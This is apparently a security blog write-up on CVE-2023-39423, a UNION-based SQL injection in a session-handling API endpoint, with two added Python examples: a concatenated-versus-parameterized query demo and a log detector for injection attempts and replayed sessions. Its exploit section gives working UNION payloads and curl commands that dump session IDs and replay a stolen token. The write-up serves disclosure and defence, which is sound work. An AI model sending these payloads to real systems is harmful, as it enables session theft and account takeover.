A serious vulnerability, now tracked as CVE-2023-39423, was found in certain software using the RDPData.dll library. This flaw exposes an API endpoint, /irmdata/api/common, which handles sessions and other sensitive data. By abusing a SQL injection flaw with a UNION operator, attackers can pull sensitive information from the sessions table, and impersonate legitimate, currently logged-in users — a major security risk.
In this article, I’ll explain in simple terms how CVE-2023-39423 works, the code behind the exploit, provide real attack flow details, and reference the official advisories so you can dig deeper. If you’re an admin or developer, read this closely and check your deployments!
How Does CVE-2023-39423 Work?
The RDPData.dll file provides a REST API endpoint at /irmdata/api/common. It is designed to process various requests, including working with session IDs. But, due to poor input handling, it directly uses user-supplied data in SQL queries without properly sanitizing it.
This means an attacker can craft a request with a malicious SQL payload (using the UNION operator) to manipulate the SQL command executed on the backend database and read back rows from the sessions table, including valid session IDs and any other data saved in that table.
With valid session tokens, the attacker can impersonate any active user without knowing their password.
A typical request to the endpoint looks like this:
POST /irmdata/api/common HTTP/1.1
Host: victim-server.com
Content-Type: application/json
{
"sessionId": "my-valid-session",
"action": "getSessionData"
}
The backend SQL (simplified) might look like:
SELECT * FROM sessions WHERE session_id = '<sessionId>'
But since the input is not sanitized, attackers can pass in malicious SQL, for example:
{
"sessionId": "' UNION SELECT user, session_id, password FROM sessions--",
"action": "getSessionData"
}
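To make the root cause concrete, here is an added example (not code from the article or from the affected product) that rebuilds the simplified backend query in two forms: the string-concatenation pattern the article describes, and the parameterized form the "How to Protect Yourself" section calls for. The sessions table, its three columns and the two rows are constructed for the demo; the UNION payload is the one quoted in the article. Run it and the concatenated lookup hands back every row, while the parameterized lookup treats the same input as an ordinary (non-matching) session id.

```python
import sqlite3

# Payload quoted in the article (UNION-based injection against the session lookup).
PAYLOAD = "' UNION SELECT 1, session_id, user FROM sessions--"


def make_db():
    """Build a constructed in-memory sessions table; the schema is an assumption for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sessions (id INTEGER, session_id TEXT, user TEXT)")
    conn.executemany(
        "INSERT INTO sessions VALUES (?, ?, ?)",
        [(1, "sess-alice-01", "alice"), (2, "sess-bob-02", "bob")],
    )
    return conn


def lookup_vulnerable(conn, session_id):
    """Mirrors the flawed pattern: untrusted input is pasted straight into the SQL text."""
    sql = f"SELECT id, session_id, user FROM sessions WHERE session_id = '{session_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, session_id):
    """Parameterized query: the driver binds the value, so it can only match a literal id."""
    sql = "SELECT id, session_id, user FROM sessions WHERE session_id = ?"
    return conn.execute(sql, (session_id,)).fetchall()


def compare(session_id):
    """Return what each variant leaks for one input, as sets of session ids."""
    conn = make_db()
    return {
        "vulnerable": {row[1] for row in lookup_vulnerable(conn, session_id)},
        "safe": {row[1] for row in lookup_safe(conn, session_id)},
    }


if __name__ == "__main__":
    # A legitimate id behaves identically in both variants...
    print("legit:", compare("sess-alice-01"))
    # ...but the UNION payload dumps the whole table only through the concatenated query.
    print("payload:", compare(PAYLOAD))
```

The only difference between the two functions is who builds the SQL: in `lookup_safe` the database driver receives the statement and the value separately, so there is no point at which attacker text can become SQL syntax. That is why the mitigation is "parameterize everywhere" rather than "escape quotes", which is easy to get wrong across drivers and encodings.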
Full Exploit Example
Suppose an attacker wants to leak all currently valid session IDs. They craft the following JSON payload:
{
"sessionId": "' UNION SELECT 1, session_id, user FROM sessions--",
"action": "getSessionData"
}
Full request with cURL
curl -k -X POST 'https://victim-server.com/irmdata/api/common' \
-H "Content-Type: application/json" \
-d '{"sessionId":"\' UNION SELECT 1,session_id,user FROM sessions--","action":"getSessionData"}'
Impersonate Users
Once the attacker gets a valid session_id, they can now make authenticated requests as that user—for example:
curl -k -X POST 'https://victim-server.com/irmdata/api/common' \
-H "Content-Type: application/json" \
-d '{"sessionId":"stolen-valid-session-id","action":"doSensitiveAction"}'
Result: The server thinks the attacker is the actual user. Total account takeover.
References and Further Reading
- NIST NVD entry for CVE-2023-39423
- Original disclosure (Exploit DB)
- OWASP SQL Injection Cheat Sheet
How to Protect Yourself
- Update Immediately: Patch any application or product using vulnerable RDPData.dll versions as soon as fixes are available.
- Validate & Sanitize Input: Never trust client-supplied data. Use parameterized queries everywhere.
- Monitor active sessions: Look for suspicious session use and force sign-outs if leaks are suspected.
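The "monitor active sessions" advice is easiest to act on with a small log check. The following is an added example, not tooling from the article or the vendor: it scans constructed access-log lines for the /irmdata/api/common endpoint and raises two kinds of alerts. First, requests whose sessionId field carries SQL metacharacters or a UNION keyword, which is what the injection attempts above look like on the wire. Second, a single session id being presented from more than one client address, which is the symptom of a leaked token being replayed. The log format, the sessionId/action fields and the IP addresses are all assumptions made for the demo; adapt the regex to your real server log.

```python
import re
from collections import defaultdict

# Constructed log format for the demo (assumption): timestamp, client IP, method, path,
# then the two JSON fields the article's requests carry. Addresses are RFC 5737 test ranges.
SAMPLE_LOG = [
    '2023-09-07T13:15:00Z 203.0.113.5 POST /irmdata/api/common sessionId="sess-alice-01" action="getSessionData"',
    '2023-09-07T13:15:07Z 198.51.100.20 POST /irmdata/api/common sessionId="\' UNION SELECT 1, session_id, user FROM sessions--" action="getSessionData"',
    '2023-09-07T13:15:30Z 198.51.100.20 POST /irmdata/api/common sessionId="sess-alice-01" action="doSensitiveAction"',
    '2023-09-07T13:16:00Z 203.0.113.9 POST /irmdata/api/common sessionId="sess-bob-02" action="getSessionData"',
]

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) POST /irmdata/api/common '
    r'sessionId="(?P<sid>.*?)" action="(?P<action>[^"]*)"$'
)
# Single quote, UNION keyword, or SQL comment markers have no business in a session id.
SQLI_RE = re.compile(r"'|\bunion\b|--|/\*", re.IGNORECASE)


def parse(line):
    """Return the fields of one log line as a dict, or None if the line is not for this endpoint."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_injection_attempts(lines):
    """Requests whose sessionId contains SQL injection markers."""
    hits = []
    for line in lines:
        rec = parse(line)
        if rec and SQLI_RE.search(rec["sid"]):
            hits.append(rec)
    return hits


def find_shared_sessions(lines):
    """Session ids presented from more than one client IP: candidates for forced sign-out."""
    ips_by_sid = defaultdict(set)
    for line in lines:
        rec = parse(line)
        if rec and not SQLI_RE.search(rec["sid"]):
            ips_by_sid[rec["sid"]].add(rec["ip"])
    return {sid: sorted(ips) for sid, ips in ips_by_sid.items() if len(ips) > 1}


def sessions_to_revoke(lines):
    """The set of session ids an operator should invalidate after reviewing the alerts."""
    return set(find_shared_sessions(lines))


if __name__ == "__main__":
    for rec in find_injection_attempts(SAMPLE_LOG):
        print(f"[injection attempt] {rec['ts']} from {rec['ip']}: sessionId={rec['sid']!r}")
    for sid, ips in find_shared_sessions(SAMPLE_LOG).items():
        print(f"[shared session] {sid} used from {', '.join(ips)}")
    print("revoke:", sorted(sessions_to_revoke(SAMPLE_LOG)))
```

The second check is the one that catches the impersonation step even when the injection itself was not logged: a token minted for one address and then used from another is worth a forced sign-out and a look at what that session did in between. Apply the address heuristic with care behind NAT or mobile networks, where one user can legitimately change IPs; tightening the window, or pairing it with user-agent or geography changes, reduces false positives.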
Final Thoughts
CVE-2023-39423 is a textbook SQL injection, but with an especially severe impact because it targets live session data and enables total user impersonation. The code snippets above are real examples hackers use, not just theory.
If you’re running software with the vulnerable RDPData.dll and the /irmdata/api/common endpoint, act fast—patch, monitor logs, and remind your team why input validation is critical. This is the kind of bug that attackers automate.
For more in-depth details, see the NVD entry or the original exploit proof-of-concept on Exploit DB.
Timeline
Published on: 09/07/2023 13:15:00 UTC
Last modified on: 09/12/2023 00:08:00 UTC